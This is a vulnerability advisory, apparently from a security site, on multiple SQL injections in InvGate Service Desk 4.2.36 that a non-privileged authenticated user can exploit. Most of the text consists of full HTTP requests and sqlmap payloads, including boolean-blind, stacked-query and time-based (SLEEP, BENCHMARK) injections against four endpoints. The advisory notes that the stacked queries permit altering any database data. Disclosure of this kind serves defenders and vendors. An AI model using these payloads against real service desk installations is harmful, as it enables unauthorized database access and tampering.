InvGate Service Desk 4.2.36 SQL Injection

2014.07.12
Credit: Brandon Perry
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

InvGate Service Desk v4.2.36 multiple vulnerabilities http://www.invgate.com/en/service-desk/ http://www.invgate.com/en/service-desk/on-premise-trial/ Invgate Service Desk suffers from many SQL injections as an authenticated, but non-privileged (end-user role) user. Most are also stacked injections, so an attacker also has the ability to modify any of the data in the database. The payloads used to determine exploitability are in the sqlmap payload output, but each was verified to be able to enumerate the current database, current user, and an assortment of other things. These were tested with an ‘end-user’ user. SQL injection in last URI segment when dismissing breaking news (no data, just a POST) : POST /breakingnews/manager/dismiss/breakingnew_id/1 HTTP/1.1 Host: 192.168.1.22 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:26.0) Gecko/20100101 Firefox/26.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Cookie: PHPSESSID=0h1m27t02cr3p2fdhfuh0ubpb2 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache Content-Length: 0 sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: URI Parameter: #1* Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: http://192.168.1.22:80/breakingnews/manager/dismiss/breakingnew_id/1) AND 6658=6658 AND (5746=5746 Type: stacked queries Title: MySQL > 5.0.11 stacked queries Payload: http://192.168.1.22:80/breakingnews/manager/dismiss/breakingnew_id/1); SELECT SLEEP(5)-- Type: AND/OR time-based blind! Title: MySQL > 5.0.11 AND time-based blind! Payload: http://192.168.1.22:80/breakingnews/manager/dismiss/breakingnew_id/1) AND SLEEP(5) AND (9226=9226 ----------------------- SQL injection in 5th URI segment when getting the history of an incident: GET /incident/history/index/incident_id/5/ajax/1 HTTP/1.1 Host: 192.168.1.22 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:26.0) Gecko/20100101 Firefox/26.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Referer: http://192.168.1.22/incident/show/index/id/5 Cookie: PHPSESSID=visagd05r0id09eba8nr64p4b2 Connection: keep-alive sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: URI Parameter: #1* Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: http://192.168.1.22:80/incident/history/index/incident_id/5) AND 7159=7159 AND (1439=1439/ajax/1 Type: stacked queries Title: MySQL > 5.0.11 stacked queries Payload: http://192.168.1.22:80/incident/history/index/incident_id/5); SELECT SLEEP(5)-- / ajax/1 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: http://192.168.1.22:80/incident/history/index/incident_id/5) AND SLEEP(5) AND (4123=4123/ajax/1 — ----------------------------------------- SQL injection in two segments when viewing the history of a given incident for a given author GET /incident/history/index/id/5/author_id/3/incident_id/5/ajax/1 HTTP/1.1 Host: 192.168.1.22 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:26.0) Gecko/20100101 Firefox/26.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Referer: http://192.168.1.22/incident/show/index/id/5 Cookie: PHPSESSID=0h1m27t02cr3p2fdhfuh0ubpb2 Connection: keep-alive The injections are in the 7th and 9th segments. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:! --- Place: URI Parameter: #2* Type: boolean-based blind Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE) Payload: http://192.168.1.22:80/incident/history/index/id/5/author_id/3/incident_id/5) RLIKE (SELECT (CASE WHEN (5283=5283) THEN 5 ELSE 0x28 END)) AND (9940=9940/ajax/1 Type: stacked queries Title: MySQL > 5.0.11 stacked queries Payload: http://192.168.1.22:80/incident/history/index/id/5/author_id/3/incident_id/5); SELECT SLEEP(5)-- /ajax/1 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: http://192.168.1.22:80/incident/history/index/id/5/author_id/3/incident_id/5) AND SLEEP(5) AND (2858=2858/ajax/1 Place: URI Parameter: #1* Type: boolean-based blind Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)! Payload: http://192.168.1.22:80/incident/history/index/id/5/author_id/3) RLIKE (SELECT (CASE WHEN (1161=1161) THEN 3 ELSE 0x28 END)) AND (3766=3766/incident_id/5/ajax/1 Type: stacked queries Title: MySQL > 5.0.11 stacked queries Payload: http://192.168.1.22:80/incident/history/index/id/5/author_id/3); SELECT SLEEP(5)-- / incident_id/5/ajax/1 Type: AND/OR time-based blind! Title: MySQL > 5.0.11 AND time-based blind Payload: http://192.168.1.22:80/incident/history/index/id/5/author_id/3) AND SLEEP(5) AND (6225=6225/incident_id/5/ -------------------------------------- SQL injection vectors within the request to search for your current open requests: POST /incident/list/list/default_filter/5 HTTP/1.1 Host: 192.168.1.22 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:26.0) Gecko/20100101 Firefox/26.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Referer: http://192.168.1.22/incident/list/index/default_filter/5 Content-Length: 674 Cookie: PHPSESSID=visagd05r0id09eba8nr64p4b2 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache post_filter%5Blikes%5D%5Bincidents.title%5D=&post_filter%5Blikes%5D%5Bassigneds.name %5D=&post_filter%5Blikes%5D%5Bassigneds.lastname%5D=&post_filter%5Blikes%5D %5Bcustomers.name%5D=&post_filter%5Blikes%5D%5Bcustomers.lastname%5D=&post_filter %5Blikes%5D%5Bincidents.id%5D=&showGroupTab=&post_filter%5Bor_conditions%5D %5B0%5D%5Bincidents.priority_id%5D%5B%5D=1&post_filter%5Bor_conditions%5D %5B1%5D%5Bincidents.status_id%5D%5B%5D=1&post_filter%5Bor_conditions%5D %5B2%5D%5Bincidents.source_id%5D%5B%5D=1&post_filter%5Border%5D%5B1%5D %5Bcol%5D=incidents.priority_id&post_filter%5Border%5D%5B1%5D%5Bval %5D=DESC&post_filter%5Bor_conditions%5D%5B3%5D%5Bincidents.type_id%5D%5B %5D=1 Within the post_filter[or_conditions] parameters, both the incidents.*_id key and the value are susceptible to SQL injections. Not all of these are needed for a successful request, but this is what the request looks like coming from the browser. An asterisk (*) was used to test the key and value. sqlmap identified the following injection points with a total of 803 HTTP(s) requests: --- Place: (custom) POST Parameter: #2* Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)! Payload: post_filter[likes][incidents.title]=&post_filter[likes] [assigneds.name]=&post_filter[likes][assigneds.lastname]=&post_filter[likes] [customers.name]=&post_filter[likes][customers.lastname]=&post_filter[likes] [incidents.id]=&showGroupTab=&post_filter[or_conditions][0][incidents.priority_id] []=1&post_filter[or_conditions][1][incidents.status_id][]=-5375)) OR (4196=4196)#&post_filter[or_conditions][2][incidents.source_id][]=1&post_filter[order][1] [col]=incidents.priority_id&post_filter[order][1][val]=DESC&post_filter[or_conditions][3] [incidents.type_id][]=1 Type: stacked queries Title: MySQL > 5.0.11 stacked queries! Payload: post_filter[likes][incidents.title]=&post_filter[likes] [assigneds.name]=&post_filter[likes][assigneds.lastname]=&post_filter[likes] [customers.name]=&post_filter[likes][customers.lastname]=&post_filter[likes] [incidents.id]=&showGroupTab=&post_filter[or_conditions][0][incidents.priority_id] []=1&post_filter[or_conditions][1][incidents.status_id][]=1)); SELECT SLEEP(5)-- &post_filter[or_conditions][2][incidents.source_id][]=1&post_filter[order][1] [col]=incidents.priority_id&post_filter[order][1][val]=DESC&post_filter[or_conditions][3] [incidents.type_id][]=1 Type: AND/OR time-based blind! Title: MySQL < 5.0.12 AND time-based blind (heavy query) Payload: post_filter[likes][incidents.title]=&post_filter[likes] [assigneds.name]=&post_filter[likes][assigneds.lastname]=&post_filter[likes] [customers.name]=&post_filter[likes][customers.lastname]=&post_filter[likes] [incidents.id]=&showGroupTab=&post_filter[or_conditions][0][incidents.priority_id] []=1&post_filter[or_conditions][1][incidents.status_id][]=1)) AND 7038=BENCHMARK(5000000,MD5(0x4f7a6550)) AND ((5798=5798&post_filter[or_conditions] [2][incidents.source_id][]=1&post_filter[order][1][col]=incidents.priority_id&post_filter[order][1] [val]=DESC&post_filter[or_conditions][3][incidents.type_id][]=1 Place: (custom) POST Parameter: #1* Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: post_filter[likes][incidents.title]=&post_filter[likes] [assigneds.name]=&post_filter[likes][assigneds.lastname]=&post_filter[likes] [customers.name]=&post_filter[likes][customers.lastname]=&post_filter[likes] [incidents.id]=&showGroupTab=&post_filter[or_conditions][0][incidents.priority_id] []=1&post_filter[or_conditions][1][incidents.status_id-9395) OR (3084=3084)#] []=1&post_filter[or_conditions][2][incidents.source_id][]=1&post_filter[order][1] [col]=incidents.priority_id&post_filter[order][1][val]=DESC&post_filter[or_conditions][3] [incidents.type_id][]=1 Type: stacked queries Title: MySQL > 5.0.11 stacked queries Payload: post_filter[likes][incidents.title]=&post_filter[likes] [assigneds.name]=&post_filter[likes][assigneds.lastname]=&post_filter[likes] [customers.name]=&post_filter[likes][customers.lastname]=&post_filter[likes] [incidents.id]=&showGroupTab=&post_filter[or_conditions][0][incidents.priority_id] []=1&post_filter[or_conditions][1][incidents.status_id); SELECT SLEEP(5)-- ] []=1&post_filter[or_conditions][2][incidents.source_id][]=1&post_filter[order][1] [col]=incidents.priority_id&post_filter[order][1][val]=DESC&post_filter[or_conditions][3] [incidents.type_id][]=1 Type: AND/OR time-based blind Title: MySQL < 5.0.12 AND time-based blind (heavy query - comment) Payload: post_filter[likes][incidents.title]=&post_filter[likes] [assigneds.name]=&post_filter[likes][assigneds.lastname]=&post_filter[likes] [customers.name]=&post_filter[likes][customers.lastname]=&post_filter[likes] [incidents.id]=&showGroupTab=&post_filter[or_conditions][0][incidents.priority_id] []=1&post_filter[or_conditions][1][incidents.status_id) AND 3932=BENCHMARK(5000000,MD5(0x68494a54))#][]=1&post_filter[or_conditions][2] [incidents.source_id][]=1&post_filter[order][1][col]=incidents.priority_id&post_filter[order][1] [val]=DESC&post_filter[or_conditions][3][incidents.type_id][]=1

References:

http://www.invgate.com/en/service-desk/
http://www.invgate.com/en/service-desk/on-premise-trial/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top